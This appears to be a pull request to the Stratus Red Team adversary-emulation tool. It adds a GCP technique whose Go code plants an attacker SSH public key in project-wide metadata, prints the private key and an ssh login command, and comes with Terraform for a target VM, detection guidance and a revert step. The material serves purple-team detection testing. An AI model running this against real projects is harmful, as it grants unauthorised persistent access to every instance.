### PR TITLE
New technique: Register SSH public key to project metadata

### DIFF
--- a/docs/attack-techniques/GCP/gcp.lateral-movement.add-sshkey-project-metadata.md
+++ b/docs/attack-techniques/GCP/gcp.lateral-movement.add-sshkey-project-metadata.md
@@ -1,0 +1,68 @@
+---
+title: Register SSH Public Key to Project Metadata
+---
+
+# Register SSH Public Key to Project Metadata
+
+<span class="smallcaps w3-badge w3-orange w3-round w3-text-sand" title="This attack technique might be slow to warm up or detonate">slow</span> 
+<span class="smallcaps w3-badge w3-blue w3-round w3-text-white" title="This attack technique can be detonated multiple times">idempotent</span> 
+
+Platform: GCP
+
+## MITRE ATT&CK Tactics
+
+
+- Lateral Movement
+- Persistence
+
+## Description
+
+Register a public key to the project's metadata to allow login and gain access to any instance in the project.
+
+<span style="font-variant: small-caps;">Warm-up</span>:
+
+- Create a compute instance (Linux)
+
+<span style="font-variant: small-caps;">Detonation</span>:
+
+- Create RSA key-pair (private key and public key)
+- Register public key to project's metadata.
+- Print private key to stdout. 
+
+Note that you need to save the private key for login. This key can be used to any instance belong to the same project.
+
+Reference:
+- https://cloud.google.com/sdk/gcloud/reference/compute/project-info/add-metadata
+- https://cloud.hacktricks.wiki/en/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.html
+
+
+## Instructions
+
+```bash title="Detonate with Stratus Red Team"
+stratus detonate gcp.lateral-movement.add-sshkey-project-metadata
+```
+
+## Detection
+
+
+Registering SSH public key to the project's metadata is detected as 'compute.projects.setCommonInstanceMetadata' in Cloud Logging
+
+Sample event (shortened for readability):
+
+```json
+{
+  "logName": "projects/my-project-id/logs/cloudaudit.googleapis.com%2Factivity",
+  "protoPayload": {
+    "authenticationInfo": {
+      "principalEmail": "username@service.com",
+    },
+	"serviceName": "compute.googleapis.com",
+    "methodName": "v1.compute.projects.setCommonInstanceMetadata",
+    "resourceName": "projects/my-project-id/zones/my-zone-id/instances/my-instance-id",
+  },
+  "resource": {
+    "type": "gce_project"
+  },
+  "severity": "NOTICE"
+}
+```

--- a/docs/attack-techniques/GCP/index.md
+++ b/docs/attack-techniques/GCP/index.md
@@ -18,6 +18,11 @@ Note that some Stratus attack techniques may correspond to more than a single AT
 - [Exfiltrate Compute Disk by sharing a snapshot](./gcp.exfiltration.share-compute-snapshot.md)
 
 
+## Lateral Movement
+
+- [Register SSH public key to project](./gcp.lateral-movement.add-sshkey-project-metadata.md)
+
+
 ## Persistence
 
 - [Backdoor a GCP Service Account through its IAM Policy](./gcp.persistence.backdoor-service-account-policy.md)

--- a/docs/attack-techniques/list.md
+++ b/docs/attack-techniques/list.md
@@ -67,6 +67,7 @@ This page contains the list of all Stratus Attack Techniques.
 | [Exfiltrate Compute Disk by sharing it](./GCP/gcp.exfiltration.share-compute-disk.md) | [GCP](./GCP/index.md) | Exfiltration |
 | [Exfiltrate Compute Image by sharing it](./GCP/gcp.exfiltration.share-compute-image.md) | [GCP](./GCP/index.md) | Exfiltration |
 | [Exfiltrate Compute Disk by sharing a snapshot](./GCP/gcp.exfiltration.share-compute-snapshot.md) | [GCP](./GCP/index.md) | Exfiltration |
+| [Register SSH public key to project metadata](./GCP/gcp.lateral-movement.add-sshkey-project-metadata.md) | [GCP](./GCP/index.md) | Lateral Movement, Persistence |
 | [Backdoor a GCP Service Account through its IAM Policy](./GCP/gcp.persistence.backdoor-service-account-policy.md) | [GCP](./GCP/index.md) | Persistence |
 | [Create an Admin GCP Service Account](./GCP/gcp.persistence.create-admin-service-account.md) | [GCP](./GCP/index.md) | Persistence, Privilege Escalation |
 | [Create a GCP Service Account Key](./GCP/gcp.persistence.create-service-account-key.md) | [GCP](./GCP/index.md) | Persistence, Privilege Escalation |

--- a/docs/index.yaml
+++ b/docs/index.yaml
@@ -415,7 +415,24 @@ GCP:
             - Exfiltration
           platform: GCP
           isIdempotent: true
+    Lateral Movement:
+        - id: gcp.lateral-movement.add-sshkey-project-metadata
+          name: Register SSH public key to project
+          isSlow: true
+          mitreAttackTactics:
+            - Lateral Movement
+            - Persistence
+          platform: GCP
+          isIdempotent: true
     Persistence:
+        - id: gcp.lateral-movement.add-sshkey-project-metadata
+          name: Register SSH public key to project
+          isSlow: true
+          mitreAttackTactics:
+            - Lateral Movement
+            - Persistence
+          platform: GCP
+          isIdempotent: true
         - id: gcp.persistence.backdoor-service-account-policy
           name: Backdoor a GCP Service Account through its IAM Policy
           isSlow: false

--- a/v2/internal/attacktechniques/gcp/lateral-movement/add-sshkey-project-metadata/main.go
+++ b/v2/internal/attacktechniques/gcp/lateral-movement/add-sshkey-project-metadata/main.go
@@ -1,0 +1,148 @@
+package gcp
+
+import (
+    "context"
+    _ "embed"
+    "fmt"
+    "log"
+    "google.golang.org/api/compute/v1"
+    gcp_utils "github.com/datadog/stratus-red-team/v2/internal/utils/gcp"
+    "github.com/datadog/stratus-red-team/v2/pkg/stratus"
+    "github.com/datadog/stratus-red-team/v2/pkg/stratus/mitreattack"
+)
+
+//go:embed main.tf
+var tf []byte
+
+const AttackerUsername = "stratus-skpm"
+
+func init() {
+    const CodeBlock = "```"
+    const AttackTechniqueId = "gcp.lateral-movement.add-sshkey-project-metadata"
+
+    stratus.GetRegistry().RegisterAttackTechnique(&stratus.AttackTechnique{
+        ID:           AttackTechniqueId,
+        FriendlyName: "Register SSH public key to project metadata",
+        Description: `
+Register a public key to the project's metadata to allow login and gain access to any instance in the project.
+
+Warm-up: 
+
+- Create a compute instance (Linux)
+
+Detonation:
+
+- Create RSA key-pair (private key and public key)
+- Register public key to project's metadata.
+- Print private key to stdout. 
+
+Note that you need to save the private key for login.
+
+Reference:
+- https://cloud.google.com/sdk/gcloud/reference/compute/project-info/add-metadata
+- https://cloud.hacktricks.wiki/en/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.html
+`,
+        Detection: `
+Registering SSH public key to the project's metadata is detected as 'compute.projects.setCommonInstanceMetadata' in Cloud Logging
+
+Sample event (shortened for readability):
+
+` + CodeBlock + `json
+{
+  "logName": "projects/my-project-id/logs/cloudaudit.googleapis.com%2Factivity",
+  "protoPayload": {
+    "authenticationInfo": {
+      "principalEmail": "username@service.com",
+    },
+    "serviceName": "compute.googleapis.com",
+    "methodName": "v1.compute.projects.setCommonInstanceMetadata",
+    "resourceName": "projects/my-project-id/zones/my-zone-id/instances/my-instance-id",
+  },
+  "resource": {
+    "type": "gce_project"
+  },
+  "severity": "NOTICE"
+}
+` + CodeBlock + `
+`,
+        Platform:                   stratus.GCP,
+        IsIdempotent:               true,
+        MitreAttackTactics:         []mitreattack.Tactic{ 
+            mitreattack.LateralMovement, 
+            mitreattack.Persistence },
+        PrerequisitesTerraformCode: tf,
+        Detonate:                   detonate,
+        Revert:                     revert,
+    })
+}
+
+func detonate(params map[string]string, providers stratus.CloudProviders) error {
+    gcp := providers.GCP()
+    ctx := context.Background()
+
+    projectId    := gcp.GetProjectId()
+    instanceIp   := params["instance_ip"]
+
+    // create compute service
+    service, err := compute.NewService(ctx)
+    if err != nil {
+        return fmt.Errorf("Failed to create compute service: %v", err)
+    }
+
+    log.Println("Generating public/private key pair for user")
+
+    // create RSA public/key pair
+    key, err := gcp_utils.CreateSSHKeyPair()
+    if err != nil {
+        return fmt.Errorf("Failed to create RSA key-pair: %v", err)
+    }
+
+    log.Println("Registering public key to project's metadata")
+    
+    // get project information
+    project, err := service.Projects.Get(projectId).Do()
+    if err != nil {
+        return fmt.Errorf("Failed to get project information: %v", err)
+    }
+
+    md := project.CommonInstanceMetadata
+    entry := fmt.Sprintf("%s:%s", AttackerUsername, string(key.PublicKey))
+
+    gcp_utils.InsertToMetadata(md, "ssh-keys", entry)
+    if _, err := service.Projects.SetCommonInstanceMetadata(projectId, md).Do(); err != nil {
+        return fmt.Errorf("Failed to update project metadata: %v", err)
+    }
+
+    log.Printf("Save this Private Key as 'account.priv':\n\n%s\n", key.PrivateKey)
+    log.Println("Attacker can now login to the instance using the following command:")
+    log.Printf("ssh -i account.priv %s@%s", AttackerUsername, instanceIp)
+
+    return nil
+}
+
+func revert(params map[string]string, providers stratus.CloudProviders) error {
+    gcp := providers.GCP()
+    ctx := context.Background()
+
+    projectId := gcp.GetProjectId()
+    
+    // create compute service
+    service, err := compute.NewService(ctx)
+    if err != nil {
+        return fmt.Errorf("Failed to create compute service: %v", err)
+    }
+    
+    // get project information
+    project, err := service.Projects.Get(projectId).Do()
+    if err != nil {
+        return fmt.Errorf("Failed to get project information: %v", err)
+    }
+
+    md := project.CommonInstanceMetadata
+    gcp_utils.RemoveSshKeyFromMetadata(md, AttackerUsername)
+    if _, err := service.Projects.SetCommonInstanceMetadata(projectId, md).Do(); err != nil {
+        return fmt.Errorf("Failed to update project metadata: %v", err)
+    }
+
+    return nil
+}

--- a/v2/internal/attacktechniques/gcp/lateral-movement/add-sshkey-project-metadata/main.tf
+++ b/v2/internal/attacktechniques/gcp/lateral-movement/add-sshkey-project-metadata/main.tf
@@ -1,0 +1,95 @@
+terraform {
+  required_providers {
+    google = {
+      source  = "hashicorp/google"
+      version = "~> 6.18.1"
+    }
+  }
+}
+
+provider "google" {
+  default_labels = {
+    stratus-red-team = "true"
+  }
+}
+
+locals {
+  resource_prefix = "stratus-red-team-skpm"
+  region          = "us-east1"
+  instance_type   = "f1-micro"
+  image           = "debian-cloud/debian-11"
+}
+
+resource "random_string" "suffix" {
+  special = false
+  length  = 16
+  min_lower = 16
+}
+
+data "google_compute_zones" "available" {
+  region = local.region
+}
+
+resource "google_compute_network" "network" {
+  name  = "${local.resource_prefix}-vpc-${random_string.suffix.result}"
+  routing_mode = "REGIONAL"
+  auto_create_subnetworks = false
+}
+
+resource "google_compute_subnetwork" "subnet" {
+  name          = "${local.resource_prefix}-subnet-${random_string.suffix.result}"
+  ip_cidr_range = "10.10.1.0/24"
+  network       = google_compute_network.network.id
+  region        = local.region
+}
+
+resource "google_compute_firewall" "firewall" {
+  name = "${local.resource_prefix}-firewall-${random_string.suffix.result}"
+  network = google_compute_network.network.id
+  allow {
+    protocol = "tcp"
+    ports    = ["22"]
+  }
+  source_ranges = ["0.0.0.0/0"]
+  target_tags   = ["ssh-access"]
+}
+
+resource "google_compute_instance" "target" {
+  name         = "${local.resource_prefix}-vm-${random_string.suffix.result}"
+  machine_type = local.instance_type
+  zone         = data.google_compute_zones.available.names[0]
+  hostname     = "target-${random_string.suffix.result}.stratus.local"
+  tags         = ["ssh-access"]
+
+  boot_disk {
+    initialize_params {
+      image = local.image
+    }
+  }
+
+  network_interface {
+    network = google_compute_network.network.id
+    subnetwork = google_compute_subnetwork.subnet.id
+
+    access_config { }
+  }
+}
+
+output "display" {
+  value = format("Linux instance (hostname: %s, ip: %s) is ready", 
+    google_compute_instance.target.name,
+    google_compute_instance.target.network_interface.0.access_config.0.nat_ip
+  )  
+}
+
+output "zone" {
+  value = data.google_compute_zones.available.names[0]
+}
+
+output "instance_name" {
+  value = google_compute_instance.target.name
+}
+
+output "instance_ip" {
+  value = google_compute_instance.target.network_interface.0.access_config.0.nat_ip
+}

--- a/v2/internal/attacktechniques/main.go
+++ b/v2/internal/attacktechniques/main.go
@@ -58,6 +58,7 @@ import (
 	_ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/gcp/exfiltration/share-compute-disk"
 	_ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/gcp/exfiltration/share-compute-image"
 	_ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/gcp/exfiltration/share-compute-snapshot"
+	_ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/gcp/lateral-movement/add-sshkey-project-metadata"
 	_ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/gcp/persistence/backdoor-service-account-policy"
 	_ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/gcp/persistence/create-admin-service-account"
 	_ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/gcp/persistence/create-service-account-key"


### PR DESCRIPTION
### What does this PR do?

* add new technique: Register SSh public key to project metadata

Lateral movement to any Cloud Compute instance by registering public key to project's metadata. This technique is affecting any instance on same project.

### Motivation

This technique is developed as part of Grab's purple teaming activity and we want to share it so more people can get the benefit.

-------

Co-authored-by: Satria Ady Pradana <xathrya@reversing.id>